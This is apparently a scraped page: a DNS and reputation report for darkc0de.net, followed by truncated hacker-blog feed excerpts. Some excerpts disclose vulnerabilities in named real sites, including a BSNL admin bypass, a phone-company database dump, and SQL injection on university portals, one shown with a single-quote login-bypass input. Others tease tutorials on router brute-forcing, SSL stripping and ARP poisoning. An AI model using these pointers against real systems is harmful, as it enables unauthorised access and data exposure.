Worth noting is that three quarter of the domains that only use the IPv4 number 204.13.162.116 use only the mail server mx.isp-inter.net. Reputation is not yet known. It is not listed in any blacklists. Search for darkc0de.net. Domain Name Reputation: Source Result WOT not yet known BLACKLIST not listed in any blacklists Result -- The following pages contain combined information gathered by searching several sources. Navigate between the pages by clicking on the tabs above. Source Date Information Mar 6, 2013 6:02:59 PM Visible DNS Information rbls.org Mar 6, 2013 6:02:56 PM Blacklistings Alexa Mar 6, 2013 6:02:56 PM Description, ranking and other stats WOT Mar 4, 2013 6:02:34 PM Reputation Jan 31, 2013 2:27:01 PM Whois information Total score 10/50 normalized to 1.5 out of 5 based on 5 tests 1.5/5 Check Result NS on different IP networks NO NS delegation consistent with zone YES Listed in DMOZ NO Listed in Alexa top 100000 NO Good WOT rating NO Indexed in Google - - More pages on the Internet describing the domain: Google Safe Browsing | McAfee SiteAdvisor | Norton Safe Web | AVG | Web of Trust | rbls.org Alexa | DNS Tree | Whois info | Domain Info API | mnw |More... DNS Records ------- Base Record Pref Name IP-number Reverse Route Autonomous System darkc0de.net a 204.13.162.116Los Angeles, CA, United States (none) 204.13.160.0/22VeriSign Customer Route AS33626 OVERSEE ns ns1.dsredirection.com 204.13.160.143Los Angeles, CA, United States ns2.dsredirection.com 204.13.161.145Los Angeles, CA, United States mx 0 mx.isp-inter.net 199.168.90.60Alexandria, VA, United States sie-spool2.deteque.com 199.168.88.0/22LLNW customer route AS54054 com net dsredirection.com isp-inter.net deteque.com Graph - darkc0de.net Shared -- IP numbers of host (1 item) * 204.13.162.116 PTRs of IP numbers (1 item) * host204-13-162-116.oversee.net Host names sharing IP with A records (99 items) * *.backpagr.com * *.bollywoodparadaise.com * *.clip.vn.com * *.hostmaster.freefootballstreaming.info * *.idshotel.com * *.jashnvare.net * *.lvwrinklerescue.com * *.mafa.com * *.ns5.root.root.ns4.tamarer.com * *.redesigns.com * *.root.ns6.root.ns1.ns2.bitagede.com * *.ropsy.com * *.www.flash108.com * *.www.indiansexstorie.com * 1.creativegift.com * 10.mtngprs.net * aislebridal.com * amosu.net * banatdrem.com * barrcudanetworks.com * biologybiozone.com * caricare.net * cenimelody.com * coolsmiles.net * coqporn.com * darmowe-cipeczki.net * diariopueblasinfronteras.com * dinotubes.com * eurowrestlers.com * fanktube.com * filter.100topcamsites.com * flayproxy.com * flive.com * freebloggertemplate.com * fusiombd.com * gkdns.com.realymodels.net * glb.onec0re.com * goaliecamps.net * got-casino.com * gov.mm.org * greenpolice.net * hangtep.com * hookerdorm.com * indiabulles.com * ipopkreyol.com * kaiclick.com * kannadawap.com * lacaravelle1.com * mail.camperplaatsen.net * mail.cat4.com * mail.chinesenic.net * mail.ggcrcbypass.com * mail.powernutrition4you.com * mail.www.bo * mavimex.com * mazda323performance.com * mega-specials.com * mistlubrication.com * moissanitebracelet.com * mx2.webdesin.com * ns1.redifmile.com * obraspublicaspr.com * okf.no * pop.lesuperbe.com * robtex.com252fwww.malaiyalamsex.com * root.sheffieldnews.com * scheda.net * seks-filmi.com * somalital.com * sx40.com * tamil-bleep.com * textbug.com * tubeya.com * twinsync.com * underunder.com * unilibertadores.com * vipknan.com * vn.thepirateapp.net * wayyn.com * worldamateurvideos.com * wripe.com * ww.masajbucuresti.com.htmlfacebook.com * www.1234567890.co * www.162by.com * www.abaixak.com * www.aldultporn.com * www.annahangtattoo.com * www.aradz.com * www.campwyoming.com * www.debonairbblog.com * www.gooyanews.com * www.hvooh.com * www.movie28.com * www.mp4mobilemovie.net * www.razkide.com * www.salmanimage.com * www.saxwab.com * www.xxfshow.com * zds.com Name servers used by this domain (2 items) * ns1.dsredirection.com * ns2.dsredirection.com Domains sharing name servers (215 items) * 1.creativegift.com * 10.mtngprs.net * 1982.me * 5starbombayhotels.com * aby-escotre-vip-paris.com * africanairport.com * aislebridal.com * alohamovies.com * amosu.net * aparthotel-piccolo-suceava.promotur.ro.htmlfacebook.com * asf.nl * banatdrem.com * barbersbulldogs.com * barensandnobel.com * barrcudanetworks.com * barstoolssupercenter.com * baylisenterprises.com * benift.com * bioghraphys.com * biologybiozone.com * bitadvertiser.com * bradleyhandbags.com * byukp.org * caribeaquasystems.com * caricare.net * cashgang.com * cenimelody.com * chinaiu.com * cisanosulneva.com * concuersonacionalalianza.org * consumercallulartv.com * content4smart.com * continteal.com * coolsmiles.net * coqporn.com * countryheart.com * cyberdump.com * dairyjobs.net * darmowe-cipeczki.net * desadmide.com * desksforcomputers.com * detgujarat.com * diariopueblasinfronteras.com * dicsoinary.com * dinotubes.com * disarms.org * diskidea.com * diversionesjunior.com * dns2.thermadorsevice.com * dot-edu.org * e-autoshop.com * e-marketing411.com * east153.com * easter1.com * eb2byellowpages.net * eldelman.com * ertly.com * eurobegrenzer.com * eurowrestlers.com * fanktube.com * filter.100topcamsites.com * flayproxy.com * flive.com * floridadivorcelaw.net * freebloggertemplate.com * fullonvod.com * fusiombd.com * gabispanic.com * gabrielamontes.com * galantcars.com * gamesage.com * gkdns.com.realymodels.net * glb.onec0re.com * goaliecamps.net * got-casino.com * gov.mm.org * greenpolice.net * hagenhotels.net * hangtep.com * harllee.com * heizoel-steinbauer.de * honolulufamilyattorney.com * hookerdorm.com * i-love-nothing.com * indiabulles.com * indiaoiltenders.com * indiaseoservice.com * indywast.com * inflationtrust.net * infopyware.com * ipopkreyol.com * jaluzitamir.com * jnjmdsol.com * jvljewlery.com * k1065.com * kachig.com * kaiclick.com * kannadawap.com * keithpiersontoyoto.com * konraqy.com * lacaravelle1.com * lacasadarte.com * libertynaute.com * loovo.net * mail.camperplaatsen.net * mail.cat4.com * mail.chinesenic.net * mail.geneticonline.com * mail.ggcrcbypass.com * mail.powernutrition4you.com * mail.pstet.com * mail.www.bo * manhours.net * mavimex.com * mazda323performance.com * mega-specials.com * mhokig.www.7yv22.www.flash108.com * midwestlandleases.com * mistlubrication.com * moissanitebracelet.com * motokeiser.com * mx2.webdesin.com * nabj.com * nadorset.com * newarktrolly.com * ns.sotaribi.com * ns1.redifmile.com * obraspublicaspr.com * okf.no * orginalbtc.com * parsz.com * phoneriot.com * pipi9x.com * piratebay2.com * plasticambiental.com * pokerstairs.org * pop.lesuperbe.com * pornteen.fr * pour-cuisiner-leger.com * qtronix.com.tw * realestatecamarillo.com * rentfortmyers.com * robtex.com252fwww.malaiyalamsex.com * root.ns1.ns2.root.ns6.ns4.www.elberer.com * root.sheffieldnews.com * runway404.com * scheda.net * searchounds.com * secretescpes.com * seks-filmi.com * shayjohnsonatl.com * shuanthesheep.com * skatesoundtrack.com * somalital.com * southendbathrooms.com * studiocatalouge.com * sx40.com * tagfoottop.com * tamil-bleep.com * taqadomy.com * telgucinemascreen.com * textbug.com * the-online-gamble-2299.us * thechedimuscat.com * thinksexist.com * timebandits.com * tj-longtouju.com * top-site-2004.info * tubeya.com * twinsync.com * undenzp.com * underunder.com * undeserving.org * unilibertadores.com * versomina.com * vipknan.com * vloggerguide.com * vn.thepirateapp.net * wayyn.com * wearenighttowls.com * weaversceramic.com * welcometocastlevania.com * wineandlife.com * wiredcave.com * worldamateurvideos.com * wripe.com * ww.masajbucuresti.com.htmlfacebook.com * www.1234567890.co * www.162by.com * www.3gpaking.com * www.abaixak.com * www.aldultporn.com * www.annahangtattoo.com * www.aradz.com * www.caddoparishschoolboardhomepage.com * www.campwyoming.com * www.debonairbblog.com * www.feertv.com * www.gooyanews.com * www.headbang.com * www.hvooh.com * www.letmewatachthis.com * www.movie28.com * www.mp4mobilemovie.net * www.mywaygames.com * www.ninhgiang.net * www.ordinary-amateurs.com * www.razkide.com * www.salmanimage.com * www.saxwab.com * www.xxfshow.com * wwwnrtoday.com * wwwpa.net * wwwphpwebhosting.com * zds.com IP numbers of name servers (2 items) * 204.13.160.143 * 204.13.161.145 Reverse names of the name servers (2 items) * ns1.dsredirection.com * ns2.dsredirection.com A of PTR of A of NS (2 items) * 204.13.160.143 * 204.13.161.145 Other names of the name servers (4 items) * ns1.thisdomainhasexpired.net * ns2.thisdomainhasexpired.net * robert-stanley-unicusmagazine-backstabbing-liar.robert-stanley-unicus-foundation-scammer-spammer-fraudster.are-we-having-fun-yet-robert-backstabbing-liar-stanley.robert-psychopath-stanley.weather-reports.net * robert-stanley-unicusmagazine-backstabbing-liar.robert-stanley-unicus-foundation-scammer-spammer-fraudster.are-we-having-fun-yet-robert-backstabbing-liar-stanley.robert-unicusmagazine-stanley.weather-reports.net Mail servers used by this domain (1 item) * mx.isp-inter.net Domains sharing mail servers (137 items) * 1.creativegift.com * 10.mtngprs.net * 1982.me * africanairport.com * aislebridal.com * alohamovies.com * amosu.net * aparthotel-piccolo-suceava.promotur.ro.htmlfacebook.com * asf.nl * banatdrem.com * barrcudanetworks.com * barstoolssupercenter.com * benift.com * biologybiozone.com * bitadvertiser.com * caricare.net * cenimelody.com * chinaiu.com * content4smart.com * continteal.com * coolsmiles.net * coqporn.com * countryheart.com * darmowe-cipeczki.net * detgujarat.com * diariopueblasinfronteras.com * dicsoinary.com * dinotubes.com * dot-edu.org * easter1.com * eb2byellowpages.net * eurowrestlers.com * fanktube.com * filter.100topcamsites.com * flayproxy.com * flive.com * freebloggertemplate.com * fusiombd.com * gamesage.com * gkdns.com.realymodels.net * glb.onec0re.com * goaliecamps.net * got-casino.com * gov.mm.org * greenpolice.net * hangtep.com * heizoel-steinbauer.de * hookerdorm.com * indiabulles.com * indiaoiltenders.com * ipopkreyol.com * jaluzitamir.com * kaiclick.com * kannadawap.com * lacaravelle1.com * loovo.net * mail.camperplaatsen.net * mail.cat4.com * mail.chinesenic.net * mail.geneticonline.com * mail.ggcrcbypass.com * mail.powernutrition4you.com * mail.pstet.com * mail.www.bo * manhours.net * mavimex.com * mazda323performance.com * mega-specials.com * mhokig.www.7yv22.www.flash108.com * mistlubrication.com * moissanitebracelet.com * mx2.webdesin.com * ns.sotaribi.com * ns1.redifmile.com * obraspublicaspr.com * okf.no * orginalbtc.com * parsz.com * phoneriot.com * piratebay2.com * pop.lesuperbe.com * pornteen.fr * rentfortmyers.com * robtex.com252fwww.malaiyalamsex.com * root.ns1.ns2.root.ns6.ns4.www.elberer.com * root.sheffieldnews.com * scheda.net * searchounds.com * seks-filmi.com * shuanthesheep.com * somalital.com * southendbathrooms.com * sx40.com * tamil-bleep.com * taqadomy.com * textbug.com * thechedimuscat.com * thinksexist.com * tubeya.com * twinsync.com * underunder.com * undeserving.org * unilibertadores.com * versomina.com * vipknan.com * vn.thepirateapp.net * wayyn.com * wearenighttowls.com * welcometocastlevania.com * worldamateurvideos.com * wripe.com * ww.masajbucuresti.com.htmlfacebook.com * www.1234567890.co * www.162by.com * www.3gpaking.com * www.abaixak.com * www.aldultporn.com * www.annahangtattoo.com * www.aradz.com * www.campwyoming.com * www.debonairbblog.com * www.feertv.com * www.gooyanews.com * www.headbang.com * www.hvooh.com * www.letmewatachthis.com * www.movie28.com * www.mp4mobilemovie.net * www.mywaygames.com * www.ninhgiang.net * www.ordinary-amateurs.com * www.razkide.com * www.salmanimage.com * www.saxwab.com * www.xxfshow.com * wwwpa.net * zds.com IP numbers of mail servers (1 item) * 199.168.90.60 Reverse names of the mail servers (1 item) * sie-spool2.deteque.com A of PTR of A of MX (2 items) * 199.168.90.60 * 2606:700:a:203::c7a8:5a3c Other names of the mail servers (3 items) * mail.mapleleafmail.com * mx01.isp-inter.net * sie-spool2.deteque.com Domains sharing mail servers under another name (2 items) * isp-inter.net * mapleleafmail.com Host names beginning with darkc0de (2 items) * darkc0de.com * darkc0de.org Similarly spelled domains (1 item) * darkcde.net Other names of the mail servers IP numbers of mail servers A of PTR of A of MX Reverse names of the mail servers A of PTR of A of NS IP numbers of name servers Name servers used by this domain Reverse names of the name servers Host names sharing IP with A records Domains sharing mail servers Domains sharing name servers 1.creativegift.com ✓ ✓ ✓ 10.mtngprs.net ✓ ✓ ✓ aislebridal.com ✓ ✓ ✓ amosu.net ✓ ✓ ✓ banatdrem.com ✓ ✓ ✓ barrcudanetworks.com ✓ ✓ ✓ biologybiozone.com ✓ ✓ ✓ caricare.net ✓ ✓ ✓ cenimelody.com ✓ ✓ ✓ coolsmiles.net ✓ ✓ ✓ coqporn.com ✓ ✓ ✓ darmowe-cipeczki.net ✓ ✓ ✓ diariopueblasinfronteras.com ✓ ✓ ✓ dinotubes.com ✓ ✓ ✓ eurowrestlers.com ✓ ✓ ✓ fanktube.com ✓ ✓ ✓ filter.100topcamsites.com ✓ ✓ ✓ flayproxy.com ✓ ✓ ✓ flive.com ✓ ✓ ✓ freebloggertemplate.com ✓ ✓ ✓ fusiombd.com ✓ ✓ ✓ gkdns.com.realymodels.net ✓ ✓ ✓ glb.onec0re.com ✓ ✓ ✓ goaliecamps.net ✓ ✓ ✓ got-casino.com ✓ ✓ ✓ gov.mm.org ✓ ✓ ✓ greenpolice.net ✓ ✓ ✓ hangtep.com ✓ ✓ ✓ hookerdorm.com ✓ ✓ ✓ indiabulles.com ✓ ✓ ✓ ipopkreyol.com ✓ ✓ ✓ kaiclick.com ✓ ✓ ✓ kannadawap.com ✓ ✓ ✓ lacaravelle1.com ✓ ✓ ✓ mail.camperplaatsen.net ✓ ✓ ✓ mail.cat4.com ✓ ✓ ✓ mail.chinesenic.net ✓ ✓ ✓ mail.ggcrcbypass.com ✓ ✓ ✓ mail.powernutrition4you.com ✓ ✓ ✓ mail.www.bo ✓ ✓ ✓ mavimex.com ✓ ✓ ✓ mazda323performance.com ✓ ✓ ✓ mega-specials.com ✓ ✓ ✓ mistlubrication.com ✓ ✓ ✓ moissanitebracelet.com ✓ ✓ ✓ mx2.webdesin.com ✓ ✓ ✓ ns1.redifmile.com ✓ ✓ ✓ obraspublicaspr.com ✓ ✓ ✓ okf.no ✓ ✓ ✓ pop.lesuperbe.com ✓ ✓ ✓ robtex.com252fwww.malaiyalamsex.com ✓ ✓ ✓ root.sheffieldnews.com ✓ ✓ ✓ scheda.net ✓ ✓ ✓ seks-filmi.com ✓ ✓ ✓ somalital.com ✓ ✓ ✓ sx40.com ✓ ✓ ✓ tamil-bleep.com ✓ ✓ ✓ textbug.com ✓ ✓ ✓ tubeya.com ✓ ✓ ✓ twinsync.com ✓ ✓ ✓ underunder.com ✓ ✓ ✓ unilibertadores.com ✓ ✓ ✓ vipknan.com ✓ ✓ ✓ vn.thepirateapp.net ✓ ✓ ✓ wayyn.com ✓ ✓ ✓ worldamateurvideos.com ✓ ✓ ✓ wripe.com ✓ ✓ ✓ ww.masajbucuresti.com.htmlfacebook.com ✓ ✓ ✓ www.1234567890.co ✓ ✓ ✓ www.162by.com ✓ ✓ ✓ www.abaixak.com ✓ ✓ ✓ www.aldultporn.com ✓ ✓ ✓ www.annahangtattoo.com ✓ ✓ ✓ www.aradz.com ✓ ✓ ✓ www.campwyoming.com ✓ ✓ ✓ www.debonairbblog.com ✓ ✓ ✓ www.gooyanews.com ✓ ✓ ✓ www.hvooh.com ✓ ✓ ✓ www.movie28.com ✓ ✓ ✓ www.mp4mobilemovie.net ✓ ✓ ✓ www.razkide.com ✓ ✓ ✓ www.salmanimage.com ✓ ✓ ✓ www.saxwab.com ✓ ✓ ✓ www.xxfshow.com ✓ ✓ ✓ zds.com ✓ ✓ ✓ 1982.me ✓ ✓ africanairport.com ✓ ✓ alohamovies.com ✓ ✓ aparthotel-piccolo-suceava.promotur.ro.htmlfacebook.com ✓ ✓ asf.nl ✓ ✓ barstoolssupercenter.com ✓ ✓ benift.com ✓ ✓ bitadvertiser.com ✓ ✓ chinaiu.com ✓ ✓ content4smart.com ✓ ✓ continteal.com ✓ ✓ countryheart.com ✓ ✓ detgujarat.com ✓ ✓ dicsoinary.com ✓ ✓ dot-edu.org ✓ ✓ easter1.com ✓ ✓ eb2byellowpages.net ✓ ✓ gamesage.com ✓ ✓ heizoel-steinbauer.de ✓ ✓ indiaoiltenders.com ✓ ✓ jaluzitamir.com ✓ ✓ loovo.net ✓ ✓ mail.geneticonline.com ✓ ✓ mail.pstet.com ✓ ✓ manhours.net ✓ ✓ mhokig.www.7yv22.www.flash108.com ✓ ✓ ns.sotaribi.com ✓ ✓ orginalbtc.com ✓ ✓ parsz.com ✓ ✓ phoneriot.com ✓ ✓ piratebay2.com ✓ ✓ pornteen.fr ✓ ✓ rentfortmyers.com ✓ ✓ root.ns1.ns2.root.ns6.ns4.www.elberer.com ✓ ✓ searchounds.com ✓ ✓ shuanthesheep.com ✓ ✓ southendbathrooms.com ✓ ✓ taqadomy.com ✓ ✓ thechedimuscat.com ✓ ✓ thinksexist.com ✓ ✓ undeserving.org ✓ ✓ versomina.com ✓ ✓ wearenighttowls.com ✓ ✓ welcometocastlevania.com ✓ ✓ www.3gpaking.com ✓ ✓ www.feertv.com ✓ ✓ www.headbang.com ✓ ✓ www.letmewatachthis.com ✓ ✓ www.mywaygames.com ✓ ✓ www.ninhgiang.net ✓ ✓ www.ordinary-amateurs.com ✓ ✓ wwwpa.net ✓ ✓ ns1.dsredirection.com ✓ ✓ ns2.dsredirection.com ✓ ✓ 204.13.160.143 ✓ ✓ 204.13.161.145 ✓ ✓ sie-spool2.deteque.com ✓ ✓ 199.168.90.60 ✓ ✓

==> Say Cyber Again.

http://www.spacerogue.net/wordpress/?feed=rss2 I don’t think this will stay on YouTube very long I got an instant DMCA take down notice as soon as it was uploaded. I filed a dispute but we all know how those go so watch it now while you can.

==> Then They Came For Me…

http://www.spacerogue.net/wordpress/?feed=rss2 First they came for Jackson, and I didn’t speak out because I didn’t play D&D. Then they came for Neidorf, and I didn’t speak out because I trusted the phone company. Then they came for Mitnick, and I didn’t speak out because I thought the government was telling the truth. Then they came for Watt, [...]

==> Anatomy of Hype

http://www.spacerogue.net/wordpress/?feed=rss2 Lets see if I can break this down chronologically. On July 12, 2012 a third party marketing firm hired by Verizon had a large database of Verizon user information ‘copied’. Verizon claims the incident was reported to authorities but no breach actually happened. This statement from Verizon raises several questions. 1. Why did a 3rd [...]

==> Book Review: This Machine Kills Secrets

http://www.spacerogue.net/wordpress/?feed=rss2 Book Review: This Machine Kills Secrets By: Andy Greenberg Penguin Group 2012 ISBN 978-1-101-59358-5 *Page references have been taken from the electronic iPad version Ill admit I havent finished the whole book yet but the way the book portrays some events I was involved in differs from my own memory. I wanted to highlight those [...]

==> Hackers and Media Hype or Big Hacks That Never Really Happened

http://www.spacerogue.net/wordpress/?feed=rss2 I have been giving my talk “Hackers and Media Hype or Big Hacks That Never Really Happened” for a few months now and I think it is time to retire it. You may have seen it at Shmoocon Epilogue, Source Boston or Hope 9. If not catch the video below. I also have the entire [...]

==> Emails From Michael In Iran

http://www.spacerogue.net/wordpress/?feed=rss2 If publishing unsourced emails claiming to be from Iran is a newsworthy event then I guess we should all copy Mikko and do the same thing. A few years ago I received a chain of emails from ‘Michael’ that started out as the normal ‘teach me to hack’ emails I receive on an almost daily [...]

==> L0pht Hacker Space Visa

http://www.spacerogue.net/wordpress/?feed=rss2 The L0pht was not the first hacker space, in fact at the time of its creation in Boston there were at least two other such spaces, Sinister House and Messiah Village, which later moved and became New Hack City, or simply New Hack. L0pht wasnt even the cause of the recent explosion of hacker spaces [...]

==> FUD can Sometimes be Useful

http://www.spacerogue.net/wordpress/?feed=rss2 There has been a story making the rounds the last few weeks that is really bugging me. I was going to let it slide but the story just wont die and every time it comes around again I just get angrier. The problem is I dont think the story is actually true, which wouldnt be [...]

==> Handle Shmandle

http://www.spacerogue.net/wordpress/?feed=rss2 A lot of people ask me why I still use a handle and go by ‘Space Rogue’ instead of using my real name. Trust me it is kinda awkward to go to a respectable con like BSides, Blackhat or even RSA and introduce myself as ‘Space Rogue’. People always ask me to repeat myself as [...]

==> bleep the SCADA is Falling!!!

http://www.spacerogue.net/wordpress/?feed=rss2 Let me say first that SCADA (supervisory control and data acquisition) attacks are real, they do happen and should be a real concern. But if we look at the recent press surrounding such attacks we see little in the way of any hard evidence that such an attack actually occurred. Instead we see rumor and [...]

==> BSNL- Dotsoft (Admin) Auth Bypass Vulnerability, calcuttatelephones.com Database Disclosure

http://www.thehackerslibrary.com/?feed=rss Profile: Dotsoft is an in-house developed software, integrating the Commercial Activities, Telecom Billing & Accounting,FRS and Directory Enquiry. It has been implemented in171 SSAs (Districts) across the country. Company URL: http://dotsoft.bsnl.co.in/ Admin url: http://dotsoft.bsnl.co.in/helpdesk/admin.asp Demo: http://www.flickr.com/photos/64621175@N03/5884121702/in/photostream http://www.flickr.com/photos/64621175@N03/5883556231/in/photostream Calcuttatelephones.com Database Disclosure, Directory Listing. http://www.calcuttatelephones.com Demo: http://www.flickr.com/photos/64621175@N03/5885441132/in/photostream Database containing 2600 plus records. phpMyAdmin SQL Dump version 2.5.7-pl1 [...]

==> Unlock Idea Net Setter – The Easiest Way

http://www.thehackerslibrary.com/?feed=rss In india IDEA launched his Netsetter USB 3G modem for internet accesss You can access upto 21mbps via this USB Net setter As I was watching people here fool others in the name of unlocking To earn money So I thought why not I educate our members Netsetter is using a Hawai [...]

==> IGNOU website+Few other Sites – SQL Injection, Weak Authentication Vulnerabilities

http://www.thehackerslibrary.com/?feed=rss IGNOU currently serves approximately 3.8 million students in India and 40 countries abroad in twenty one schools and a network of 59 regional centres, 7 sub-regional centres, 2600 study centres, and 52 overseas centres. IGNOU website is somehow vulnerable to SQL Injection & Weak Authentication Vulnerability. Some modules of site www.ignou.ac.in have weak authentication, [...]

==> vsworld.com – SQL Injection Vulnerability

http://www.thehackerslibrary.com/?feed=rss vsworld – SQL Injection Vulnerability Profile: Developing solutions for areas as diverse as technology, trading, power, travel, education and retail. In addition, regularly called upon to cater to the requirements of prestigious Government Bodies. Various prestigious clients are in Client list. Vendor URL:http://www.vsworld.com/index.php Vulnerability Type : SQL Injection Vulnerable URL: http://www.vsworld.com/index.php/en/admin-login.html & http://www.vsworld.com/index.php =>VSM Login [...]

==> Sandeep’s Commentry on the Linux Kernel – Part 1

http://www.thehackerslibrary.com/?feed=rss I will provide a hands on guide on dissecting and learning the Linux kernel . But I am busy with work and so forth and It may not be able to post in regular way. I however will not spoon feed and I will just be providing general guidelines. Also I will covering the linux [...]

==> Bom Sabado – A new orkut worm

http://www.thehackerslibrary.com/?feed=rss Bom Sabado means in english happy saturday it is a worm spreaded by some brazilian group in this article i m going to share its working process and how to prevent from it hope u enjoy the article In this attack , u get some scrap saying bom sabado and your account hanged you joined [...]

==> Orkut Bug: Community Hacking

http://www.thehackerslibrary.com/?feed=rss There was a bug few days ago in new orkut Some of big community like Stanford was hacked back then So here is the post how it was hacked The attacker transfers a dummy community to himself Then he start capturing what data proceed during the transfer By this attacker uses a Firefox addon called [...]

==> SSL Hijacking

http://www.thehackerslibrary.com/?feed=rss It discusses the weakness in the SSL certificate signing request which gets exploited for making fake certificates. Finally, the article shows how to run the SSLStrip tool on Windows and hijack the SSL successfully. What is SSLStrip The SSLStrip works by watching http traffic, then by acting as a proxy when a user attempts to [...]

==> Sikkim Manipal University portal can be hacked via SQL Injection

http://www.thehackerslibrary.com/?feed=rss About the university: Sikkim Manipal is one of the largest private University in India. The Institute attracts students from all over the country, with over 1700 students enrolled in the various engineering disciplines. 102 full-time faculties are employed. Type of problem: SQL Injection Vulnerable Portal: http://portal.smude.edu.in/ User Name: sanjay any name will Password: ‘ [...]

==> Future is Open Source…………………..NOT !

http://www.thehackerslibrary.com/?feed=rss We are hearing this things from years that open source is the future of the world ,everything will be open source in future but i dont think it is possible in a logical way ,i know i sound very strange and against the majority but i know whatever point and example i am going to [...]

==> Heap Overflows: Ancient Art of Unlink Seduction

http://www.thehackerslibrary.com/?feed=rss Hi, Here’s an article which introduces the earlier techniques of Heap Overflows. I find that it is almost mandatory to understand these basic, albeit useful, techniques. Dynamic Memory Allocation and the Heap The data associated with a program in memory can be allocated to one of 3 areas: (a) The data segment for global data, [...]

==> Cracking Router Password

http://www.thehackerslibrary.com/?feed=rss In this tutorial we will use brutus but you can use any brute forcer So download brutus from below link http://www.hoobie.net/brutus/brutus-download.html step 1- when we try to access our router it will ask for id and password ,we can use some of the default id password like admin:admin,admin:12345 etc etc ………….. step 2 – now [...]

==> Google Hacking Part 2

http://www.thehackerslibrary.com/?feed=rss As in the first part arbu posted about the basic of google hacking in this part i m just going to put some of the basic important google dork only that a hacker used. This article is only for educational purpose so if any one misuse it that will not be my responsibility or this [...]

==> Code Classics

http://www.thehackerslibrary.com/?feed=rss An few anecdotes about code snippets that range from the craziest to the most elegant Cryptic quote by Kawigi 1 double m[]= {7709179928849219.0, 771};int main(){m[1]--?m[0]*=2,main():printf(m);} This cryptic code when run outputs “C++ sucks” A Quine is a computer program which produces a copy of its own source code as its only output. 1 main() { [...]

==> ARP Poisoning -ARP Spoofing :Info And Defense

http://www.thehackerslibrary.com/?feed=rss Article Taken from : Sean Whalen (http://www.rootsecure.net/content/downloads/pdf/arp_spoofing_intro.pdf) This article is for educational purpose only if someone misuse the information then author or site admin is not responsible for it Introduction A computer connected to an IP/Ethernet LAN has two addresses. One is the address of the network card, called the MAC address. The MAC, in [...]

==> Cross Website Scripting(XSS) Info and Prevention

http://www.thehackerslibrary.com/?feed=rss So here I m gonna write an article over XSS aka cross website scripting Some declaration-this article is only meant for educational purpose if someone uses it for wrong purpose then THL is not responsible for it . Note since THL will not going to show the codes so I modify then now [...]

==> Restoring lost partitions using Ubuntu live CD

http://www.thehackerslibrary.com/?feed=rss FAQ: How do I restore my lost partition table? I accidentally deleted my partition table, how do I recover my data? How to recover deleted partitions and data in them? Recover data from deleted drives. WARNING: If you’ve formatted and/or added new data to the drive, or carried on with an OS installation, chances of [...]

==> DDoS Attacks and DDoS Defense Mechanisms

http://www.thehackerslibrary.com/?feed=rss Introduction Distributed denial-of-service attacks (DDoS) pose an immense threat to the Internet, and consequently many defense mechanisms have been proposed to combat them. Attackers constantly modify their tools to bypass these security systems, and researchers in turn modify their approaches to handle new attacks.The DDoS field is evolving quickly, and it is becoming increasingly hard [...]

==> Unable To See Hidden Files

http://www.thehackerslibrary.com/?feed=rss We must have usually faced a problem that we cannot ‘view the hidden files’, even after selecting the option from the Folder Options Menu, and when we go back to check, we see that it has been mysteriously restored to ‘Do Not Show Hidden Files & Folders’. It happens due to a small bug/virus which [...]

==> Practical Compiler Development Part 1

http://www.thehackerslibrary.com/?feed=rss Practical Compiler Development Tutorial Part 1 This is a rather informal introduction to development of a hobby compiler . The more formal chapters on compiler development will be given in later tutorials. By the end of this tutorial you will be able to create a simple interpreter . This can be easily converted into [...]

==> Dynamic DLL Injection

http://www.thehackerslibrary.com/?feed=rss As in my previous post I describe about the static dll injection Now we will look at the dynamic dll injection. which is mostly used by Trojans. After a program has been executed, a process is created in the OS. When an attacker attempts to load code into the process memory space, then the attacker [...]

==> Quantum Computing the new Horizon in Computing History

http://www.thehackerslibrary.com/?feed=rss The massive amount of processing power generated by computer manufacturers has not yet been able to quench our thirst for speed and computing capacity. In 1947, American computer engineer Howard Aiken said that just six electronic digital computers would satisfy the computing needs of the United States. Others have made similar errant predictions about the [...]

==> Semantic E-mail Delivery: The Future of E-mail?

http://www.thehackerslibrary.com/?feed=rss Smart email figures out who should get messages. new cutting edge technology? or just another waste of time? Perhaps you might discover a life-changing potential so stay tuned. A prototype e-mail system being tested at Stanford University later this year will radically change how users specify where their messages are supposed to be delivered. [...]

==> Spyware – A Threat To Your Privacy:Info and Defence

http://www.thehackerslibrary.com/?feed=rss What is spyware ? Spyware is Internet jargon for Advertising Supported software (Adware). It is a way for shareware authors to make money from a product, other than by selling it to the users. technically it is a software which spies on you it spy over your music habits(just like google is spying on your [...]

==> Buffer Over Flow Attack

http://www.thehackerslibrary.com/?feed=rss If you are reading this post then you definitely have some idea about computer programming and process, A computer program executes various processes and goes on balancing equations for which it has been created. In the new era of programming we generally see that companies recruit only those programmers which are efficient in programming. Now [...]

==> CAIN and ABEL Tutorial 4

http://www.thehackerslibrary.com/?feed=rss This will contain Network Enumerator Promiscuous-mode scanner Sniffer SQL Server 2000 Password Extractor Traceroute Network Enumerator The Network Enumerator uses the native Windows network management functions (Net*) to discover what is present on the network. It allows a quick identification of Domain Controllers, SQL Servers, Printer Servers, Remote Access Dial-In Servers, Novell Servers, Apple File [...]

==> Hotlinking and Bandwidth Theft

http://www.thehackerslibrary.com/?feed=rss The internet is going at a pretty fast pace. We can also find bloggers, webmasters and website developers among ourselves these days. This is an important reason for me to write this post. Before proceeding let me give a small introduction about what actually I have posted here. Introduction Bandwidth theft does not mean cracking [...]

==> CAIN and ABEL Tutorial 3

http://www.thehackerslibrary.com/?feed=rss This part of the tutorial will contain Certificates Collector Cisco Config Downloader/Uploader Mac Scanner Certificates Collector Cain’s Certificates Collector grabs server certificates from HTTPS web sites and prepares them for APR-HTTPS. The feature is automatically used by the HTTPS sniffer filter but you can also use it manually to create a list of pre-calculated fake [...]

==> CAIN and ABEL Tutorial 2

http://www.thehackerslibrary.com/?feed=rss This part of the tutorial will cover: ARP Poison Routing APR-HTTPS APR APR (ARP Poison Routing) is a main feature of the program. It enables sniffing on switched networks and the hijacking of IP traffic between hosts. The name “ARP Poison Routing” derives from the two steps needed to perform such unusual network sniffing: an [...]

==> CAIN and ABEL Tutorial 1

http://www.thehackerslibrary.com/?feed=rss This tutorial will cover (version 4.9.8) INTRODUCTION Cain is an easy application to install and configure. However, there are several powerful tools that should only be configured after you fully understand both the capabilities and consequences to the application and the target network. After all, you cant very well hack a network if you take [...]

==> The PE Format

http://www.thehackerslibrary.com/?feed=rss Warning: This document is contains purely technical information. This can be considered as iron, out of which weapons can be made . Additionally, this is about 48 pages long and written by me Introduction: Windows uses the Portable Executable Format to store executable files, also known as an “image” of an executable. Although the PE [...]

==> BandWidth Explained

